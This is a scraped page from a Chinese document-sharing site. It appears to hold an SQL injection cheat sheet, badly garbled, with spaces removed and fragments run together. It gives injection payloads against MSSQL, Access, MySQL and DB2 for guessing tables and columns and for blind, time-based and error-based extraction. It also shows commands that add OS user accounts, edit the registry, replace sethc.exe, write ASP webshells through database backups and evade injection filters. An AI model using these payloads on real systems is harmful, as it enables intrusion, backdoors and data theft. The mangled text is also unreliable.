版權說明:本文檔由用戶提供并上傳,收益歸屬內容提供方,若內容存在侵權,請進行舉報或認領
文檔簡介
ANDAND與AND1=2執(zhí)行SQL當執(zhí)行/url.asp?id=1andexists(selectidfrom[admin])selectselect*fromtablewhereid=1andexists(selectidfromSQL的查詢執(zhí)行結果。當執(zhí)行/url.asp?id=1and1=2unionallselect1,2,fromadminSelectSelect*fromtablewhereid=1and1=2unionallselect1,2,……from /url.asp?id=1and /url.asp?id=1and/url.asp?id=1anduser MSSQL/url.asp?id=1'and /url.asp?id=1'and/url.asp?id=1anduserchar(124)=0and MSSQL/url.asp?search=t%25'and25'='&/url.asp?search=t%25'and 判斷搜索過濾不嚴%25當作/url.asp?search=t%25'and1=1and &/url.asp?search=t%25'and1=2and/url.asp?search=t%25'anduserchar(124)=0and MSSQLSELECTSELECT*FROMnewswhere(((info)Like"t%"))and注意:當你嘗試在OfficeAccess中測試這條命令時,該語句將無法查詢出正確結果,因為ANSISQL中的通配符(%)和(_)只能在 Access數(shù)據(jù)庫引擎和AccessOLEDBProvider中使用。如果通過Access或DAO使用,它們將被視為文字。And(selectcount(*)fromMSSQLAnd(selectcount(*)fromAccess猜表名、列名(字段名Andexists(select*fromadminadminAndexists(selectusernamefromadmin判斷admin表下是否存在名為usernameUNIONAnd1=2UnionallSelect1,2,fromSQL語句中的“ 某些表/SQL中的保留關鍵字或系統(tǒng)變量對象,都必須使用And(selectCount(1)from countAnd(selectCount(1)from[admin]where1=1)between0And(selecttop1len(password)fromtopAnd(selecttop1len(password)fromadmin)between0猜字段的ASCII值AndAnd(selecttop1asc(mid(字段名,1,1))from表名;And(selecttop1unicode(substring(字段名,1,1))from表名between30and130//And(selecttop1ord(password,1,1)from MssqlphpordMid函數(shù)用于定位字符串里的字符,AscAscii編碼。97a、49例:asc(mid(username,2,1))表示使用midusername2asciiAndAnd(selecttop1left(username,1)fromAnd(selecttop1left(username,2)from left AccessAccess舉例說明:(7個字段,admin3個字段unionunionselect1,2,3,4,5,6,7,8,9,10fromadminunionselect1,2,3,4,5,6,7,*fromadminunionunionselect1,2,3,4,*from(adminasainnerjoinadminasbonunionselect1,2,3,4,a.id,*from(adminasainnerjoinadminasbona.id=b.id)unionselect1,2,3,4,a.id,b.id,*fromunionselect1,2,3,4,a.id,*from(adminasainnerjoinadminasbona.id=b.id)unionselect1,2,3,4,a.id,b.id,*from(adminasainnerjoinadminasbona.id=b.id)unionunionselect1,2,3,a.id,b.id,c.id,*from((adminasainnerjoinadminasbona.id=b.id)innerjoinadminasconunionselect1,a.id,b.id,c.id,d.id,*from(((adminasainnerjoinadminasbona.id=b.id)innerjoinadminascona.id=c.id)innerjoinadminasdona.id=d.id)利用注射點判斷數(shù)據(jù)庫WEB利用注射點判斷數(shù)據(jù)庫WEB得到客戶端主機名與服務端主機名selecthost_name();select 測試MSSQL;--SQLand1=(selectIS_SRVROLEMEMBER('serveradmin'));-and1=(selectIS_SRVROLEMEMBER('setupadmin'));-and1=(selectIS_SRVROLEMEMBER('securityadmin'));-and1=(selectIS_SRVROLEMEMBER('diskadmin'));-and1=(selectIS_SRVROLEMEMBER('bulkadmin'));-and1=(selectIS_MEMBER('db_owner'));-HAVING暴表名、字段名t'having1=1-t'groupbyidhaving1=1-t'groupbyid,useridhavingOLEDBProviderforSQLServer80040e14’users.IDGROUPBY基于時間的SQL注入(延時注入) 5'-- -- Mssql注意:查詢使用的值(55秒)1秒(WAITFORDELAY'0:0:1')24小時(WAITFORDELAY取得合理平衡。較小的值能為我們提供較快的響應,但可能會因為受未預料的網(wǎng)絡延遲或服務器最大負 .htmMSSQL2000+注釋符SQL 、 、andand userSQLserverint出錯 如果是sa權限。提示的是將“dbo”轉換成int出錯and(select SQL;declare@aint and(selectcount(1)from and xtyp(i(and(selecttop1namefrom(selecttop1id,namefromsysobjectswherextype=char(85))Torderbyid and(selecttop1namefrom(selecttop2id,namefromsysobjectswherextype=char(85))Torderbyid and(selecttop1namefromsysobjectswhereand(selecttop1namefromsysobjectswherextype='U'andnamenotin第一個表名)COL_NAME(able_id,column_id)table_id是表的標識號,column_id是列的標識號。object_id(admin)adminsysobjects中的標識號,column_id=1,2,3admin1,2,3列,and(selecttop1col_name(object_id('表段'),1)fromand(selecttop1col_name(object_id('表段'),2)fromand(selecttop1from表段and(selecttop1fromwhere;update;updateset列名='內容where;updateadminsetpassword='123'where;insertintovalues(內容;insertintoadminvalues(admin,123)-;dropdatabase SAandSAand1=(SELECTcount(*)FROMmaster.dbo.sysobjectsWHERExtype='X'ANDname= 判斷 是否被刪除,返回正常說明存在 ', 恢復 ;exec 'netuserMyName123456 cmd;exec 'dir;exec SAcreatetabledirs(pathsvarchar(100),idint)insertdirsexecmaster.dbo.xp_dirtree'c:\'and(selecttop1pathsfromdirs)>0and(selecttop1pathsfromdirswherepathsnotin('createtabletemp(idnvarchar(255),num1nvarchar(255),num2nvarchar(255),num3nvarchar(255));- 的insertintotemp(id)exec Sa點執(zhí)行 可以結合IIS的adsutil.vbs快速查表根鍵,xp_regread表根鍵,xp_regread根鍵,子鍵,xp_regwrite根鍵,子鍵,值名,值類型xp_regdeletevalue根鍵,子鍵,值名execxp_regdeletekey根鍵,子鍵2REG_SZ表示字符型,REG_DWORD exec exec 寫 // usecreatetableusecreatetablecmd(strinsertintocmd(str)values('<%evalrequest(chr(35))%>');backupdatabasemodeltodisk='c:\l.asp';and(select and(select Windowsanduser_name()='dbo' and(selectuser_name())>0// and(select Public注意:SQLServerAgent服務必須開啟,Selecthost_name()獲取當前庫服務器機器名USEUSEEXECsp_add_job@job_name='GetSystemOnSQL',@enabled=1,@delete_level=EXECsp_add_jobstep@job_name='GetSystemOnSQL',@step_name='Execmysql',@subsystem= "netuseriislogerhook/add>c:\fish.txt"'''''',N''Master'''EXECsp_add_jobserver@job_name='GetSystemOnSQL',@server_nameSQL服務器名EXECsp_start_job@job_name= MSSQL2005手工盲注Andsubstring((selectAndsubstring((selectAndAnd(selectcount(*)frommaster.dbo.sysdatabaseswhere And(selectcount(*)frommaster.dbo.sysdatabaseswheredbid=5and dbidAnd(selectcount(*)frommaster.dbo.sysdatabaseswheredbid=5and And(selectcount(*)And(selectcount(*)fromdatabase.dbo.sysobjectswherextype='u'andnamelike And(selectcount(*)fromdatabase.dbo.sysobjectswherenamein(selecttop1namefromdatabase.dbo.sysobjectswherextype='u')andlen(name)=9)=1 And(selectcount(*)fromdatabase.dbo.sysobjectswherenamein(selecttop1namefromdatabase.dbo.sysobjectswherextype='u')andascii(substring(name,1,1))>90)=1 And(selectcount(*)fromdatabase.dbo.sysobjectswherenamein(selecttop1namefromdatabase.dbo.sysobjectswherextype='u'andnamenotin('table1'))andascii(substring(name,1,1))>90)=1 猜第二個表名(And(selectcount(*)fromdatabase.dbo.syscolumnswherenamein(selecttop1namefromdatabase_db.dbo.syscolumnswhereid=object_id('database.dbo.table'))And(selectcount(*)fromdatabase.dbo.syscolumnswherenamein(selecttop1namefromdatabase_db.dbo.syscolumnswhereid=object_id('database.dbo.table'))andascii(substring(name,1,1))>90)=1 And(selectcount(*)fromdatabase.dbo.syscolumnswherenamein(selecttop1namefromdatabase_db.dbo.syscolumnswhereid=object_id('database.dbo.table')andnamenotin('column1'))and 猜第二個(And(selectcount(*)fromdatabase.dbo.tablewherenamein(selecttop1namefromdatabase_db.dbo.table)andAnd(selectcount(*)fromdatabase.dbo.tablewherenamein(selecttop1namefromdatabase_db.dbo.table)and MMSSQLexec 'netexec 'net execexecexecmaster..xp_regwriteExecution\WindowsNT\CurrentVersion\Imageexecmaster..xp_regwriteExecution\WindowsNT\CurrentVersion\Image 執(zhí)行命令(netdeclare@aint;execmaster..sp_oacreate'WScript.S ',@aoutput;execmaster..sp_oamethod@a,'run',null,'cmd/cnetuser>C:\WINDOWS\Temp\~098611.tmp',0,'true'Ifobject_id('dark_temp')isnotnulldroptabledark_temp;createtabledark_temp(aanvarchar(4000));bulkinsertdark_tempfrom'C:\WINDOWS\Temp\~098611.tmp'execexecSelect*From ("cmd/cnetuser>Ifobject_id('dark_temp')isnotnulldroptabledark_temp;createtabledark_temp(aanvarchar(4000));bulkdark_tempFSOmaster..xp_unpackcab'C:\windows\temp\~098611.tmp','C:\WINDOWS\system32',1,'Sethc.exe'Cab拷貝文件(cmd.exetomaster..xp_unpackcab'C:\windows\temp\~098611.tmp','C:\WINDOWS\system32',1,'Sethc.exe'能開啟 EXECmaster..sp_configure'showadvancedoptions',1;RECONFIGURE;EXECmaster..sp_configure'AdHocDistributed11.LogbackupalterdatabaseSetrecoveryfull;dumptransactionwithno_log;Ifobject_id('dark_temp')isnotnulldroptabledark_temp;createtabledark_temp(aasql_variantprimarykey)backupdatabasetodisk='C:\windows\temp\~098611.tmp'withinsertdark_tempvalues('<%evalbackuplog數(shù)據(jù)庫名to :DarkBlade1.3 MMSSQL11createtable[dbo].[jm_tmp([cmdimage]) 2、declare@asysname,@snvarchar(4000)select@a=db_name(),@s=0X6A006D00640063007700database@atodisk@s 備份數(shù)據(jù)庫,@s為備份名稱(jmdcw16進制轉換2insertinto[jm_tmp](cmd//將一句話木馬“<%execute(request("l"))%>163declare@asysname,@snvarchar(4000)select@a=db_name(),@s='C:\Program Shared\WebServerExtensions\40\isapi\jm.asp'backupdatabase@atodisk=@sWITHDIFFERENTIAL,FORMAT–//對數(shù)據(jù)庫實行差異備份,備份的保存路徑暫定為C 5、droptable[jm_tmp 數(shù)據(jù)庫!其實還有很多小技巧,如果權限足夠的話,可以備份到同一段的其他機器,比如域內的,或者 11droptablejm_tmp];createtablejm_tmp](valuenavrchar(4000)null,datanvarchar(4000)null//1deletejm_tmp];insert[jm_tmp]exec// 插到表字段3、and(selecttop1cast([data]asnvarchar(4000)+char(124)from[jm_tmp]orderby[data] //4、droptablejm_tmp// 11、droptablejm_tmp];createtablejm_tmp](subdirectorynvarchar(400)NULL,depthtinyintNULL,[file]bitNULL//[//C3、and1=(selecttop1cast([subdirectory]asnvarchar(400))+char(124)+cast([file]asFrom(SelectTop1[subdirectory],[file]From[jm_tmp]ORDERBY[file],[subdirectory])TORDERBYdesc,[subdirectory]desc) //4、and1=(selecttop1cast([subdirectory]asnvarchar(400))+char(124)+cast([file]asFrom(SelectTop2[subdirectory],[file]From[jm_tmp]ORDERBY[file],[subdirectory])TORDERBY[file]desc,[subdirectory]desc)‘ 5、and1=(selecttop1cast([subdirectory]asnvarchar(400))+char(124)+cast([file]asnvarchar(1))+char(124)From(SelectTopX[subdirectory],[file]From[jm_tmp]ORDERBY[file],[subdirectory])TORDERBY[file]desc,[subdirectory]desc) X6、droptablejm_tmp Mysql5.xMysql5.xselectSCHEMA_NAMEfrominformation_schema.SCHEMATAlimit5,1/*// 5,1155,1/*TABLE_SCHEMA=16進制selectCOLUMN_NAMEfrominformation_schema.COLUMNSwherelimitMYSQLand1=2unionselect and1=2unionselect HEXlimitOrderby and1=2unionselect HEXlimit利用利用Mysql ark ark根unionselect php的max_execution_time最大執(zhí)行時間默認配置,mysql錯IDSinformation_schemamysql>mysql>SELECT*FROM(SELECT*FROMuserAJOINuserB)C;ERROR1060(42S21):Duplicatecolumnname'Host'mysql>SELECT*FROM(SELECT*FROMuserAJOINuserBUSING(Host))C;ERROR1060(42S21):Duplicatecolumnname'User'mysql>SELECT*FROM(SELECT*FROMuserAJOINuserBUSING(Host,User))C;ERROR1060(42S21):Duplicatecolumnname'Password'64mysql>mysql>SELECT1FROM(selectcount(*),concat(floor(rand(0)*2),(SELECT'x'))afrominformation_schema.tablesgroupbya)b;ERROR1062(23000):Duplicateentry'1x'forkey MySQL64MID慢慢 /2009/10/advanced-sql-injection-lab-full-pack.html mysql>mysql>SELECT1FROMdede_adminWHEREupdatexml(1,(SELECT,MID(pwd,4,16),0x5d)FROMERROR1105(HY000):XPATHsyntaxerror:IBMDB2注射語句 selectselectNAMEfromSYSIBM.SYSCOLUMNSwhereTBCREATOR=''and selectselectNAMEfromSYSIBM.SYSTABLESwhereCREATOR=USERFETCHFIRST1ROWS sqlservertopSUBSTR(string,SUBSTR(string,position, //ascandand(selectASCII(SUBSTR(NAME,1,1))fromSYSIBM.SYSTABLESwhereCREATOR=USERFETCHFIRST1ROWSONLY)>50– tableascii繞過防注入方法URLEncode編碼,URLEncode編碼,ASCIIor1=1or'swords'mssqlor'swords'or1=1or1=1判斷繞過,or'swords'or'swordsor'swordsN'swordsNmssqlservernvarchar類型,它起到類型轉IDS。or'swords'or'swords'=‘sw'+'ords';EXEC(‘IN'+'SERTINTO'+'…..'or'swords'LIKE'sw'or'swords'LIKE'sw'LIKE的思路差不多,LIKE的思路差不多,or'swords'INor'swordsBETWEENor'swordsBETWEENrw'ANDor'swords'>'sw'oror'swords'>'sw'or'swords'<'tw'or1<3UNION/**/Select/**/user,pwd,from ,如U/**/NION/**/SE/**/LECT/**/user,pwdfromEE00EE00 值給a,然后調用變量a最終執(zhí)行我們輸 令。變量a可以是任何命令。如下declare@asysnameselect@a=exec %20@a;-“netuserangelpassphpsafe_modephpsafe_modeOn的時候會過濾'為\'如果前面加個%d5的話,就和%5c構成一個漢字:誠使用%And使用%Andexi%%sts(s%%elect*%fr%%omASC
溫馨提示
- 1. 本站所有資源如無特殊說明,都需要本地電腦安裝OFFICE2007和PDF閱讀器。圖紙軟件為CAD,CAXA,PROE,UG,SolidWorks等.壓縮文件請下載最新的WinRAR軟件解壓。
- 2. 本站的文檔不包含任何第三方提供的附件圖紙等,如果需要附件,請聯(lián)系上傳者。文件的所有權益歸上傳用戶所有。
- 3. 本站RAR壓縮包中若帶圖紙,網(wǎng)頁內容里面會有圖紙預覽,若沒有圖紙預覽就沒有圖紙。
- 4. 未經(jīng)權益所有人同意不得將文件中的內容挪作商業(yè)或盈利用途。
- 5. 人人文庫網(wǎng)僅提供信息存儲空間,僅對用戶上傳內容的表現(xiàn)方式做保護處理,對用戶上傳分享的文檔內容本身不做任何修改或編輯,并不能對任何下載內容負責。
- 6. 下載文件中如有侵權或不適當內容,請與我們聯(lián)系,我們立即糾正。
- 7. 本站不保證下載資源的準確性、安全性和完整性, 同時也不承擔用戶因使用這些下載資源對自己和他人造成任何形式的傷害或損失。
最新文檔
- 初中教師崗位聘任合同范例
- 地倉化肥銷售合同范例
- 母牛購銷合同范例
- 付材料款合同范例
- 企業(yè)人事合同范例
- 房車用地出售合同范例
- 橙子供貨合同范例
- 社區(qū)居委會宣傳合同范例
- 展臺搭建乙方合同范例
- 江西公路合同范例
- PFMEA的嚴重度SOD的評分和優(yōu)先級別
- 國網(wǎng)基建國家電網(wǎng)公司輸變電工程結算管理辦法
- 100道遞等式計算(能巧算得要巧算)
- 【2019年整理】園林景觀設計費取費標準
- 中國地圖含省份信息可編輯矢量圖
- 完整word版,ETS5使用教程
- 路政運政交通運輸執(zhí)法人員考試題庫
- 《血流動力學監(jiān)測》PPT課件.ppt
- 企業(yè)技術標準化管理
- 投資學第19章財務分析stu
- 已有輸華貿易的國家(地區(qū))及水產品品種目錄
評論
0/150
提交評論